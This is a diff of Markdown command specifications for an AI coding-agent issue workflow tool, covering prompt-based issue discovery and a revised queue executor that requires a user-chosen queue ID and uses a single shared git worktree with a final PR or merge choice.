await writeJsonl(`${outputDir}/discovery-issues.jsonl`, issues);
|
||||
|
||||
// Update final state (summary embedded in state, no separate file)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'complete',
|
||||
updated_at: new Date().toISOString(),
|
||||
results: {
|
||||
total_iterations: iteration,
|
||||
total_findings: cumulativeFindings.length,
|
||||
issues_generated: issues.length,
|
||||
comparison_match_rate: comparisonResults
|
||||
? average(comparisonResults.map(r => r.match_rate))
|
||||
: null
|
||||
}
|
||||
});
|
||||
|
||||
// Prompt user for next action
|
||||
await AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Discovery complete: ${issues.length} issues from ${cumulativeFindings.length} findings across ${iteration} iterations. What next?`,
|
||||
header: "Next Step",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Export to Issues (Recommended)", description: `Export ${issues.length} issues for planning` },
|
||||
{ label: "Review Details", description: "View comparison analysis and iteration details" },
|
||||
{ label: "Run Deeper", description: "Continue with more iterations" },
|
||||
{ label: "Skip", description: "Complete without exporting" }
|
||||
]
|
||||
}]
|
||||
});
|
||||
```
|
||||
|
||||
## Output File Structure
|
||||
|
||||
```
|
||||
.workflow/issues/discoveries/
|
||||
└── {DBP-YYYYMMDD-HHmmss}/
|
||||
├── discovery-state.json # Session state with iteration tracking
|
||||
├── iterations/
|
||||
│ ├── 1/
|
||||
│ │ └── {dimension}.json # Dimension findings
|
||||
│ ├── 2/
|
||||
│ │ └── {dimension}.json
|
||||
│ └── ...
|
||||
├── comparison-analysis.json # Cross-dimension comparison (if applicable)
|
||||
└── discovery-issues.jsonl # Generated issue candidates
|
||||
```
|
||||
|
||||
**Simplified Design**:
|
||||
- ACE context and Gemini plan kept in memory, not persisted
|
||||
- Iteration summaries embedded in state
|
||||
- No separate summary.md (state.json contains all needed info)
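
`updateDiscoveryState`, used throughout the phases, is a thin read-merge-write helper over `discovery-state.json` (a sketch, reusing the `readJson`/`writeJson` helpers already shown above):

```javascript
// Sketch: merge a partial update into discovery-state.json
async function updateDiscoveryState(outputDir, patch) {
  const path = `${outputDir}/discovery-state.json`;
  const state = await readJson(path);
  const next = { ...state, ...patch, updated_at: new Date().toISOString() };
  await writeJson(path, next);
  return next;
}
```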
|
||||
|
||||
## Schema References
|
||||
|
||||
| Schema | Path | Used By |
|
||||
|--------|------|---------|
|
||||
| **Discovery State** | `discovery-state-schema.json` | Orchestrator (state tracking) |
|
||||
| **Discovery Finding** | `discovery-finding-schema.json` | Dimension agents (output) |
|
||||
| **Exploration Plan** | `exploration-plan-schema.json` | Gemini output validation (memory only) |
|
||||
|
||||
## Configuration Options
|
||||
|
||||
| Flag | Default | Description |
|
||||
|------|---------|-------------|
|
||||
| `--scope` | `**/*` | File pattern to explore |
|
||||
| `--depth` | `standard` | `standard` (3 iterations) or `deep` (5+ iterations) |
|
||||
| `--max-iterations` | 5 | Maximum exploration iterations |
|
||||
| `--tool` | `gemini` | Planning tool (gemini/qwen) |
|
||||
| `--plan-only` | `false` | Stop after Phase 2 (Gemini planning), show plan for user review |
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Single Module Deep Dive
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Find all potential issues in the auth module" --scope=src/auth/**
|
||||
```
|
||||
|
||||
**Gemini plans** (single dimension):
|
||||
- Dimension: auth-module
|
||||
- Focus: security vulnerabilities, edge cases, error handling, test gaps
|
||||
|
||||
**Iterations**: 2-3 (until no new findings)
|
||||
|
||||
### Example 2: API Contract Comparison
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Check if API calls match implementations" --scope=src/**
|
||||
```
|
||||
|
||||
**Gemini plans** (comparison):
|
||||
- Dimension 1: api-consumers (fetch calls, hooks, services)
|
||||
- Dimension 2: api-providers (handlers, routes, controllers)
|
||||
- Comparison matrix: endpoints, methods, payloads, responses
|
||||
|
||||
### Example 3: Multi-Module Audit
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Audit the payment flow for issues" --scope=src/payment/**
|
||||
```
|
||||
|
||||
**Gemini plans** (multi-dimension):
|
||||
- Dimension 1: payment-logic (calculations, state transitions)
|
||||
- Dimension 2: validation (input checks, business rules)
|
||||
- Dimension 3: error-handling (failure modes, recovery)
|
||||
|
||||
### Example 4: Plan Only Mode
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Find inconsistent patterns" --plan-only
|
||||
```
|
||||
|
||||
Stops after Gemini planning, outputs:
|
||||
```
|
||||
Gemini Plan:
|
||||
- Intent: search
|
||||
- Dimensions: 2 (pattern-definitions, pattern-usages)
|
||||
- Estimated iterations: 3
|
||||
|
||||
Continue with exploration? [Y/n]
|
||||
```
|
||||
|
||||
## Related Commands
|
||||
|
||||
```bash
|
||||
# After discovery, plan solutions
|
||||
/issue:plan DBP-001-01,DBP-001-02
|
||||
|
||||
# View all discoveries
|
||||
/issue:manage
|
||||
|
||||
# Standard perspective-based discovery
|
||||
/issue:discover src/auth/** --perspectives=security,bug
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Be Specific in Prompts**: More specific prompts lead to better Gemini planning
|
||||
2. **Scope Appropriately**: Narrow scope for focused comparison, wider for audits
|
||||
3. **Review Exploration Plan**: Run with `--plan-only` first to inspect the Gemini plan before long explorations
|
||||
4. **Use Standard Depth First**: Start with standard, go deep only if needed
|
||||
5. **Combine with `/issue:discover`**: Use prompt-based for comparisons, perspective-based for audits
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
name: execute
|
||||
description: Execute queue with DAG-based parallel orchestration (one commit per solution)
|
||||
argument-hint: "[--worktree [<existing-path>]] [--queue <queue-id>]"
|
||||
argument-hint: "--queue <queue-id> [--worktree [<existing-path>]]"
|
||||
allowed-tools: TodoWrite(*), Bash(*), Read(*), AskUserQuestion(*)
|
||||
---
|
||||
|
||||
@@ -17,21 +17,64 @@ Minimal orchestrator that dispatches **solution IDs** to executors. Each executo
|
||||
- `done <id>` → update solution completion status
|
||||
- No race conditions: status changes only via `done`
|
||||
- **Executor handles all tasks within a solution sequentially**
|
||||
- **Worktree isolation**: Each executor can work in its own git worktree
|
||||
- **Single worktree for entire queue**: One worktree isolates ALL queue execution from main workspace
|
||||
|
||||
## Queue ID Requirement (MANDATORY)
|
||||
|
||||
**Queue ID is REQUIRED.** You MUST specify which queue to execute via `--queue <queue-id>`.
|
||||
|
||||
### If Queue ID Not Provided
|
||||
|
||||
When `--queue` parameter is missing, you MUST:
|
||||
|
||||
1. **List available queues** by running:
|
||||
```javascript
|
||||
const result = Bash('ccw issue queue list --brief --json');
|
||||
const index = JSON.parse(result);
|
||||
```
|
||||
|
||||
2. **Display available queues** to user:
|
||||
```
|
||||
Available Queues:
|
||||
ID Status Progress Issues
|
||||
-----------------------------------------------------------
|
||||
→ QUE-20251215-001 active 3/10 ISS-001, ISS-002
|
||||
QUE-20251210-002 active 0/5 ISS-003
|
||||
QUE-20251205-003 completed 8/8 ISS-004
|
||||
```
|
||||
|
||||
3. **Stop and ask user** to specify which queue to execute:
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Which queue would you like to execute?",
|
||||
header: "Queue",
|
||||
multiSelect: false,
|
||||
options: index.queues
|
||||
.filter(q => q.status === 'active')
|
||||
.map(q => ({
|
||||
label: q.id,
|
||||
description: `${q.status}, ${q.completed_solutions || 0}/${q.total_solutions || 0} completed, Issues: ${q.issue_ids.join(', ')}`
|
||||
}))
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
4. **After user selection**, continue execution with the selected queue ID.
|
||||
|
||||
**DO NOT auto-select queues.** Explicit user confirmation is required to prevent accidental execution of wrong queue.
|
||||
|
||||
## Usage
|
||||
|
||||
```bash
|
||||
/issue:execute # Execute active queue(s)
|
||||
/issue:execute --queue QUE-xxx # Execute specific queue
|
||||
/issue:execute --worktree # Use git worktrees for parallel isolation
|
||||
/issue:execute --worktree --queue QUE-xxx
|
||||
/issue:execute --worktree /path/to/existing/worktree # Resume in existing worktree
|
||||
/issue:execute --queue QUE-xxx # Execute specific queue (REQUIRED)
|
||||
/issue:execute --queue QUE-xxx --worktree # Execute in isolated worktree
|
||||
/issue:execute --queue QUE-xxx --worktree /path/to/existing/worktree # Resume
|
||||
```
|
||||
|
||||
**Parallelism**: Determined automatically by task dependency DAG (no manual control)
|
||||
**Executor & Dry-run**: Selected via interactive prompt (AskUserQuestion)
|
||||
**Worktree**: Creates isolated git worktrees for each parallel executor
|
||||
**Worktree**: Creates ONE worktree for the entire queue execution (not per-solution)
|
||||
|
||||
**⭐ Recommended Executor**: **Codex** - Best for long-running autonomous work (2hr timeout), supports background execution and full write access
|
||||
|
||||
@@ -44,37 +87,101 @@ Minimal orchestrator that dispatches **solution IDs** to executors. Each executo
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
Phase 0 (if --worktree): Setup Worktree Base
|
||||
└─ Ensure .worktrees directory exists
|
||||
Phase 0: Validate Queue ID (REQUIRED)
|
||||
├─ If --queue provided → use specified queue
|
||||
├─ If --queue missing → list queues, prompt user to select
|
||||
└─ Store QUEUE_ID for all subsequent commands
|
||||
|
||||
Phase 0.5 (if --worktree): Setup Queue Worktree
|
||||
├─ Create ONE worktree for entire queue: .ccw/worktrees/queue-<timestamp>
|
||||
├─ All subsequent execution happens in this worktree
|
||||
└─ Main workspace remains clean and untouched
|
||||
|
||||
Phase 1: Get DAG & User Selection
|
||||
├─ ccw issue queue dag [--queue QUE-xxx] → { parallel_batches: [["S-1","S-2"], ["S-3"]] }
|
||||
├─ ccw issue queue dag --queue ${QUEUE_ID} → { parallel_batches: [["S-1","S-2"], ["S-3"]] }
|
||||
└─ AskUserQuestion → executor type (codex|gemini|agent), dry-run mode, worktree mode
|
||||
|
||||
Phase 2: Dispatch Parallel Batch (DAG-driven)
|
||||
├─ Parallelism determined by DAG (no manual limit)
|
||||
├─ All executors work in the SAME worktree (or main if no worktree)
|
||||
├─ For each solution ID in batch (parallel - all at once):
|
||||
│ ├─ (if worktree) Create isolated worktree: git worktree add
|
||||
│ ├─ Executor calls: ccw issue detail <id> (READ-ONLY)
|
||||
│ ├─ Executor gets FULL SOLUTION with all tasks
|
||||
│ ├─ Executor implements all tasks sequentially (T1 → T2 → T3)
|
||||
│ ├─ Executor tests + verifies each task
|
||||
│ ├─ Executor commits ONCE per solution (with formatted summary)
|
||||
│ ├─ Executor calls: ccw issue done <id>
|
||||
│ └─ (if worktree) Cleanup: merge branch, remove worktree
|
||||
│ └─ Executor calls: ccw issue done <id>
|
||||
└─ Wait for batch completion
|
||||
|
||||
Phase 3: Next Batch
|
||||
Phase 3: Next Batch (repeat Phase 2)
|
||||
└─ ccw issue queue dag → check for newly-ready solutions
|
||||
|
||||
Phase 4 (if --worktree): Worktree Completion
|
||||
├─ All batches complete → prompt for merge strategy
|
||||
└─ Options: Create PR / Merge to main / Keep branch
|
||||
```
|
||||
|
||||
## Implementation
|
||||
|
||||
### Phase 0: Validate Queue ID
|
||||
|
||||
```javascript
|
||||
// Check if --queue was provided
|
||||
let QUEUE_ID = args.queue;
|
||||
|
||||
if (!QUEUE_ID) {
|
||||
// List available queues
|
||||
const listResult = Bash('ccw issue queue list --brief --json').trim();
|
||||
const index = JSON.parse(listResult);
|
||||
|
||||
if (index.queues.length === 0) {
|
||||
console.log('No queues found. Use /issue:queue to create one first.');
|
||||
return;
|
||||
}
|
||||
|
||||
// Filter active queues only
|
||||
const activeQueues = index.queues.filter(q => q.status === 'active');
|
||||
|
||||
if (activeQueues.length === 0) {
|
||||
console.log('No active queues found.');
|
||||
console.log('Available queues:', index.queues.map(q => `${q.id} (${q.status})`).join(', '));
|
||||
return;
|
||||
}
|
||||
|
||||
// Display and prompt user
|
||||
console.log('\nAvailable Queues:');
|
||||
console.log('ID'.padEnd(22) + 'Status'.padEnd(12) + 'Progress'.padEnd(12) + 'Issues');
|
||||
console.log('-'.repeat(70));
|
||||
for (const q of index.queues) {
|
||||
const marker = q.id === index.active_queue_id ? '→ ' : ' ';
|
||||
console.log(marker + q.id.padEnd(20) + q.status.padEnd(12) +
|
||||
`${q.completed_solutions || 0}/${q.total_solutions || 0}`.padEnd(12) +
|
||||
q.issue_ids.join(', '));
|
||||
}
|
||||
|
||||
const answer = AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Which queue would you like to execute?",
|
||||
header: "Queue",
|
||||
multiSelect: false,
|
||||
options: activeQueues.map(q => ({
|
||||
label: q.id,
|
||||
description: `${q.completed_solutions || 0}/${q.total_solutions || 0} completed, Issues: ${q.issue_ids.join(', ')}`
|
||||
}))
|
||||
}]
|
||||
});
|
||||
|
||||
QUEUE_ID = answer['Queue'];
|
||||
}
|
||||
|
||||
console.log(`\n## Executing Queue: ${QUEUE_ID}\n`);
|
||||
```
|
||||
|
||||
### Phase 1: Get DAG & User Selection
|
||||
|
||||
```javascript
|
||||
// Get dependency graph and parallel batches
|
||||
const dagJson = Bash(`ccw issue queue dag`).trim();
|
||||
// Get dependency graph and parallel batches (QUEUE_ID required)
|
||||
const dagJson = Bash(`ccw issue queue dag --queue ${QUEUE_ID}`).trim();
|
||||
const dag = JSON.parse(dagJson);
|
||||
|
||||
if (dag.error || dag.ready_count === 0) {
|
||||
@@ -115,12 +222,12 @@ const answer = AskUserQuestion({
|
||||
]
|
||||
},
|
||||
{
|
||||
question: 'Use git worktrees for parallel isolation?',
|
||||
question: 'Use git worktree for queue isolation?',
|
||||
header: 'Worktree',
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: 'Yes (Recommended for parallel)', description: 'Each executor works in isolated worktree branch' },
|
||||
{ label: 'No', description: 'Work directly in current directory (serial only)' }
|
||||
{ label: 'Yes (Recommended)', description: 'Create ONE worktree for entire queue - main stays clean' },
|
||||
{ label: 'No', description: 'Work directly in current directory' }
|
||||
]
|
||||
}
|
||||
]
|
||||
@@ -140,7 +247,7 @@ if (isDryRun) {
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 2: Dispatch Parallel Batch (DAG-driven)
|
||||
### Phase 0 & 2: Setup Queue Worktree & Dispatch
|
||||
|
||||
```javascript
|
||||
// Parallelism determined by DAG - no manual limit
|
||||
@@ -158,24 +265,40 @@ TodoWrite({
|
||||
|
||||
console.log(`\n### Executing Solutions (DAG batch 1): ${batch.join(', ')}`);
|
||||
|
||||
// Setup worktree base directory if needed (using absolute paths)
|
||||
if (useWorktree) {
|
||||
// Use absolute paths to avoid issues when running from subdirectories
|
||||
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
|
||||
const worktreeBase = `${repoRoot}/.ccw/worktrees`;
|
||||
Bash(`mkdir -p "${worktreeBase}"`);
|
||||
// Prune stale worktrees from previous interrupted executions
|
||||
Bash('git worktree prune');
|
||||
}
|
||||
|
||||
// Parse existing worktree path from args if provided
|
||||
// Example: --worktree /path/to/existing/worktree
|
||||
const existingWorktree = args.worktree && typeof args.worktree === 'string' ? args.worktree : null;
|
||||
|
||||
// Setup ONE worktree for entire queue (not per-solution)
|
||||
let worktreePath = null;
|
||||
let worktreeBranch = null;
|
||||
|
||||
if (useWorktree) {
|
||||
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
|
||||
const worktreeBase = `${repoRoot}/.ccw/worktrees`;
|
||||
Bash(`mkdir -p "${worktreeBase}"`);
|
||||
Bash('git worktree prune'); // Cleanup stale worktrees
|
||||
|
||||
if (existingWorktree) {
|
||||
// Resume mode: Use existing worktree
|
||||
worktreePath = existingWorktree;
|
||||
worktreeBranch = Bash(`git -C "${worktreePath}" branch --show-current`).trim();
|
||||
console.log(`Resuming in existing worktree: ${worktreePath} (branch: ${worktreeBranch})`);
|
||||
} else {
|
||||
// Create mode: ONE worktree for the entire queue
|
||||
const timestamp = new Date().toISOString().replace(/[-:T]/g, '').slice(0, 14);
|
||||
worktreeBranch = `queue-exec-${dag.queue_id || timestamp}`;
|
||||
worktreePath = `${worktreeBase}/${worktreeBranch}`;
|
||||
Bash(`git worktree add "${worktreePath}" -b "${worktreeBranch}"`);
|
||||
console.log(`Created queue worktree: ${worktreePath}`);
|
||||
}
|
||||
}
|
||||
|
||||
// Launch ALL solutions in batch in parallel (DAG guarantees no conflicts)
|
||||
// All executors work in the SAME worktree (or main if no worktree)
|
||||
const executions = batch.map(solutionId => {
|
||||
updateTodo(solutionId, 'in_progress');
|
||||
return dispatchExecutor(solutionId, executor, useWorktree, existingWorktree);
|
||||
return dispatchExecutor(solutionId, executor, worktreePath);
|
||||
});
|
||||
|
||||
await Promise.all(executions);
|
||||
@@ -185,126 +308,20 @@ batch.forEach(id => updateTodo(id, 'completed'));
|
||||
### Executor Dispatch
|
||||
|
||||
```javascript
|
||||
function dispatchExecutor(solutionId, executorType, useWorktree = false, existingWorktree = null) {
|
||||
// Worktree setup commands (if enabled) - using absolute paths
|
||||
// Supports both creating new worktrees and resuming in existing ones
|
||||
const worktreeSetup = useWorktree ? `
|
||||
### Step 0: Setup Isolated Worktree
|
||||
\`\`\`bash
|
||||
# Use absolute paths to avoid issues when running from subdirectories
|
||||
REPO_ROOT=$(git rev-parse --show-toplevel)
|
||||
WORKTREE_BASE="\${REPO_ROOT}/.ccw/worktrees"
|
||||
|
||||
# Check if existing worktree path was provided
|
||||
EXISTING_WORKTREE="${existingWorktree || ''}"
|
||||
|
||||
if [[ -n "\${EXISTING_WORKTREE}" && -d "\${EXISTING_WORKTREE}" ]]; then
|
||||
# Resume mode: Use existing worktree
|
||||
WORKTREE_PATH="\${EXISTING_WORKTREE}"
|
||||
WORKTREE_NAME=$(basename "\${WORKTREE_PATH}")
|
||||
|
||||
# Verify it's a valid git worktree
|
||||
if ! git -C "\${WORKTREE_PATH}" rev-parse --is-inside-work-tree &>/dev/null; then
|
||||
echo "Error: \${EXISTING_WORKTREE} is not a valid git worktree"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "Resuming in existing worktree: \${WORKTREE_PATH}"
|
||||
else
|
||||
# Create mode: New worktree with timestamp
|
||||
WORKTREE_NAME="exec-${solutionId}-$(date +%H%M%S)"
|
||||
WORKTREE_PATH="\${WORKTREE_BASE}/\${WORKTREE_NAME}"
|
||||
|
||||
# Ensure worktree base exists
|
||||
mkdir -p "\${WORKTREE_BASE}"
|
||||
|
||||
# Prune stale worktrees
|
||||
git worktree prune
|
||||
|
||||
# Create worktree
|
||||
git worktree add "\${WORKTREE_PATH}" -b "\${WORKTREE_NAME}"
|
||||
|
||||
echo "Created new worktree: \${WORKTREE_PATH}"
|
||||
fi
|
||||
|
||||
# Setup cleanup trap for graceful failure handling
|
||||
cleanup_worktree() {
|
||||
echo "Cleaning up worktree due to interruption..."
|
||||
cd "\${REPO_ROOT}" 2>/dev/null || true
|
||||
git worktree remove "\${WORKTREE_PATH}" --force 2>/dev/null || true
|
||||
echo "Worktree removed. Branch '\${WORKTREE_NAME}' kept for inspection."
|
||||
}
|
||||
trap cleanup_worktree EXIT INT TERM
|
||||
|
||||
cd "\${WORKTREE_PATH}"
|
||||
\`\`\`
|
||||
` : '';
|
||||
|
||||
const worktreeCleanup = useWorktree ? `
|
||||
### Step 5: Worktree Completion (User Choice)
|
||||
|
||||
After all tasks complete, prompt for merge strategy:
|
||||
|
||||
\`\`\`javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Solution ${solutionId} completed. What to do with worktree branch?",
|
||||
header: "Merge",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Create PR (Recommended)", description: "Push branch and create pull request - safest for parallel execution" },
|
||||
{ label: "Merge to main", description: "Merge branch and cleanup worktree (requires clean main)" },
|
||||
{ label: "Keep branch", description: "Cleanup worktree, keep branch for manual handling" }
|
||||
]
|
||||
}]
|
||||
})
|
||||
\`\`\`
|
||||
|
||||
**Based on selection:**
|
||||
\`\`\`bash
|
||||
# Disable cleanup trap before intentional cleanup
|
||||
trap - EXIT INT TERM
|
||||
|
||||
# Return to repo root (use REPO_ROOT from setup)
|
||||
cd "\${REPO_ROOT}"
|
||||
|
||||
# Validate main repo state before merge
|
||||
validate_main_clean() {
|
||||
if [[ -n \$(git status --porcelain) ]]; then
|
||||
echo "⚠️ Warning: Main repo has uncommitted changes."
|
||||
echo "Cannot auto-merge. Falling back to 'Create PR' option."
|
||||
return 1
|
||||
fi
|
||||
return 0
|
||||
}
|
||||
|
||||
# Create PR (Recommended for parallel execution):
|
||||
git push -u origin "\${WORKTREE_NAME}"
|
||||
gh pr create --title "Solution ${solutionId}" --body "Issue queue execution"
|
||||
git worktree remove "\${WORKTREE_PATH}"
|
||||
|
||||
# Merge to main (only if main is clean):
|
||||
if validate_main_clean; then
|
||||
git merge --no-ff "\${WORKTREE_NAME}" -m "Merge solution ${solutionId}"
|
||||
git worktree remove "\${WORKTREE_PATH}" && git branch -d "\${WORKTREE_NAME}"
|
||||
else
|
||||
# Fallback to PR if main is dirty
|
||||
git push -u origin "\${WORKTREE_NAME}"
|
||||
gh pr create --title "Solution ${solutionId}" --body "Issue queue execution (main had uncommitted changes)"
|
||||
git worktree remove "\${WORKTREE_PATH}"
|
||||
fi
|
||||
|
||||
# Keep branch:
|
||||
git worktree remove "\${WORKTREE_PATH}"
|
||||
echo "Branch \${WORKTREE_NAME} kept for manual handling"
|
||||
\`\`\`
|
||||
|
||||
**Parallel Execution Safety**: "Create PR" is the default and safest option for parallel executors, avoiding merge race conditions.
|
||||
` : '';
|
||||
// worktreePath: path to shared worktree (null if not using worktree)
|
||||
function dispatchExecutor(solutionId, executorType, worktreePath = null) {
|
||||
// If worktree is provided, executor works in that directory
|
||||
// No per-solution worktree creation - ONE worktree for entire queue
|
||||
const cdCommand = worktreePath ? `cd "${worktreePath}"` : '';
|
||||
|
||||
const prompt = `
|
||||
## Execute Solution ${solutionId}
|
||||
${worktreeSetup}
|
||||
${worktreePath ? `
|
||||
### Step 0: Enter Queue Worktree
|
||||
\`\`\`bash
|
||||
cd "${worktreePath}"
|
||||
\`\`\`
|
||||
` : ''}
|
||||
### Step 1: Get Solution (read-only)
|
||||
\`\`\`bash
|
||||
ccw issue detail ${solutionId}
|
||||
@@ -352,16 +369,21 @@ If any task failed:
|
||||
\`\`\`bash
|
||||
ccw issue done ${solutionId} --fail --reason '{"task_id": "TX", "error_type": "test_failure", "message": "..."}'
|
||||
\`\`\`
|
||||
${worktreeCleanup}`;
|
||||
|
||||
**Note**: Do NOT clean up the worktree after this solution. The worktree is shared by all solutions in the queue.
|
||||
`;
|
||||
|
||||
// For CLI tools, pass --cd to set working directory
|
||||
const cdOption = worktreePath ? ` --cd "${worktreePath}"` : '';
|
||||
|
||||
if (executorType === 'codex') {
|
||||
return Bash(
|
||||
`ccw cli -p "${escapePrompt(prompt)}" --tool codex --mode write --id exec-${solutionId}`,
|
||||
`ccw cli -p "${escapePrompt(prompt)}" --tool codex --mode write --id exec-${solutionId}${cdOption}`,
|
||||
{ timeout: 7200000, run_in_background: true } // 2hr for full solution
|
||||
);
|
||||
} else if (executorType === 'gemini') {
|
||||
return Bash(
|
||||
`ccw cli -p "${escapePrompt(prompt)}" --tool gemini --mode write --id exec-${solutionId}`,
|
||||
`ccw cli -p "${escapePrompt(prompt)}" --tool gemini --mode write --id exec-${solutionId}${cdOption}`,
|
||||
{ timeout: 3600000, run_in_background: true }
|
||||
);
|
||||
} else {
|
||||
@@ -369,7 +391,7 @@ ${worktreeCleanup}`;
|
||||
subagent_type: 'code-developer',
|
||||
run_in_background: false,
|
||||
description: `Execute solution ${solutionId}`,
|
||||
prompt: prompt
|
||||
prompt: worktreePath ? `Working directory: ${worktreePath}\n\n${prompt}` : prompt
|
||||
});
|
||||
}
|
||||
}
|
||||
@@ -378,8 +400,8 @@ ${worktreeCleanup}`;
|
||||
### Phase 3: Check Next Batch
|
||||
|
||||
```javascript
|
||||
// Refresh DAG after batch completes
|
||||
const refreshedDag = JSON.parse(Bash(`ccw issue queue dag`).trim());
|
||||
// Refresh DAG after batch completes (use same QUEUE_ID)
|
||||
const refreshedDag = JSON.parse(Bash(`ccw issue queue dag --queue ${QUEUE_ID}`).trim());
|
||||
|
||||
console.log(`
|
||||
## Batch Complete
|
||||
@@ -389,46 +411,117 @@ console.log(`
|
||||
`);
|
||||
|
||||
if (refreshedDag.ready_count > 0) {
|
||||
console.log('Run `/issue:execute` again for next batch.');
|
||||
console.log(`Run \`/issue:execute --queue ${QUEUE_ID}\` again for next batch.`);
|
||||
// Note: If resuming, pass existing worktree path:
|
||||
// /issue:execute --queue ${QUEUE_ID} --worktree <worktreePath>
|
||||
}
|
||||
```
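
For orchestrators driving this loop from a shell rather than the JavaScript pseudocode above, a minimal sketch of the same check, assuming `jq` is installed and `QUEUE_ID` is the queue selected earlier:

```bash
# Re-read the DAG for the same queue and decide whether another batch is needed
READY=$(ccw issue queue dag --queue "${QUEUE_ID}" | jq -r '.ready_count')
if [[ "${READY}" -gt 0 ]]; then
  echo "Next batch ready: run /issue:execute --queue ${QUEUE_ID} again"
fi
```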
|
||||
|
||||
### Phase 4: Worktree Completion (after ALL batches)
|
||||
|
||||
```javascript
|
||||
// Only run when ALL solutions completed AND using worktree
|
||||
if (useWorktree && refreshedDag.ready_count === 0 && refreshedDag.completed_count === refreshedDag.total) {
|
||||
console.log('\n## All Solutions Completed - Worktree Cleanup');
|
||||
|
||||
const answer = AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Queue complete. What to do with worktree branch "${worktreeBranch}"?`,
|
||||
header: 'Merge',
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: 'Create PR (Recommended)', description: 'Push branch and create pull request' },
|
||||
{ label: 'Merge to main', description: 'Merge all commits and cleanup worktree' },
|
||||
{ label: 'Keep branch', description: 'Cleanup worktree, keep branch for manual handling' }
|
||||
]
|
||||
}]
|
||||
});
|
||||
|
||||
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
|
||||
|
||||
if (answer['Merge'].includes('Create PR')) {
|
||||
Bash(`git -C "${worktreePath}" push -u origin "${worktreeBranch}"`);
|
||||
Bash(`gh pr create --title "Queue ${dag.queue_id}" --body "Issue queue execution - all solutions completed" --head "${worktreeBranch}"`);
|
||||
Bash(`git worktree remove "${worktreePath}"`);
|
||||
console.log(`PR created for branch: ${worktreeBranch}`);
|
||||
} else if (answer['Merge'].includes('Merge to main')) {
|
||||
// Check main is clean
|
||||
const mainDirty = Bash('git status --porcelain').trim();
|
||||
if (mainDirty) {
|
||||
console.log('Warning: Main has uncommitted changes. Falling back to PR.');
|
||||
Bash(`git -C "${worktreePath}" push -u origin "${worktreeBranch}"`);
|
||||
Bash(`gh pr create --title "Queue ${dag.queue_id}" --body "Issue queue execution (main had uncommitted changes)" --head "${worktreeBranch}"`);
|
||||
} else {
|
||||
Bash(`git merge --no-ff "${worktreeBranch}" -m "Merge queue ${dag.queue_id}"`);
|
||||
Bash(`git branch -d "${worktreeBranch}"`);
|
||||
}
|
||||
Bash(`git worktree remove "${worktreePath}"`);
|
||||
} else {
|
||||
Bash(`git worktree remove "${worktreePath}"`);
|
||||
console.log(`Branch ${worktreeBranch} kept for manual handling`);
|
||||
}
|
||||
}
|
||||
```
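
Whichever option is chosen, it can help to confirm the worktree was actually detached before moving on. A small verification sketch using plain git; `${worktreeBranch}` stands in for the branch name used above:

```bash
# List remaining worktrees and drop any stale registrations
git worktree list
git worktree prune

# The queue branch should still exist only if "Create PR" or "Keep branch" was chosen
git branch --list "${worktreeBranch}"
```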
|
||||
|
||||
## Parallel Execution Model
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────┐
|
||||
│ Orchestrator │
|
||||
├─────────────────────────────────────────────────────────────┤
|
||||
│ 1. ccw issue queue dag │
|
||||
│ → { parallel_batches: [["S-1","S-2"], ["S-3"]] } │
|
||||
│ │
|
||||
│ 2. Dispatch batch 1 (parallel): │
|
||||
│ ┌──────────────────────┐ ┌──────────────────────┐ │
|
||||
│ │ Executor 1 │ │ Executor 2 │ │
|
||||
│ │ detail S-1 │ │ detail S-2 │ │
|
||||
│ │ → gets full solution │ │ → gets full solution │ │
|
||||
│ │ [T1→T2→T3 sequential]│ │ [T1→T2 sequential] │ │
|
||||
│ │ commit (1x solution) │ │ commit (1x solution) │ │
|
||||
│ │ done S-1 │ │ done S-2 │ │
|
||||
│ └──────────────────────┘ └──────────────────────┘ │
|
||||
│ │
|
||||
│ 3. ccw issue queue dag (refresh) │
|
||||
│ → S-3 now ready (S-1 completed, file conflict resolved) │
|
||||
└─────────────────────────────────────────────────────────────┘
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Orchestrator │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ 0. Validate QUEUE_ID (required, or prompt user to select) │
|
||||
│ │
|
||||
│ 0.5 (if --worktree) Create ONE worktree for entire queue │
|
||||
│ → .ccw/worktrees/queue-exec-<queue-id> │
|
||||
│ │
|
||||
│ 1. ccw issue queue dag --queue ${QUEUE_ID} │
|
||||
│ → { parallel_batches: [["S-1","S-2"], ["S-3"]] } │
|
||||
│ │
|
||||
│ 2. Dispatch batch 1 (parallel, SAME worktree): │
|
||||
│ ┌──────────────────────────────────────────────────────┐ │
|
||||
│ │ Shared Queue Worktree (or main) │ │
|
||||
│ │ ┌──────────────────┐ ┌──────────────────┐ │ │
|
||||
│ │ │ Executor 1 │ │ Executor 2 │ │ │
|
||||
│ │ │ detail S-1 │ │ detail S-2 │ │ │
|
||||
│ │ │ [T1→T2→T3] │ │ [T1→T2] │ │ │
|
||||
│ │ │ commit S-1 │ │ commit S-2 │ │ │
|
||||
│ │ │ done S-1 │ │ done S-2 │ │ │
|
||||
│ │ └──────────────────┘ └──────────────────┘ │ │
|
||||
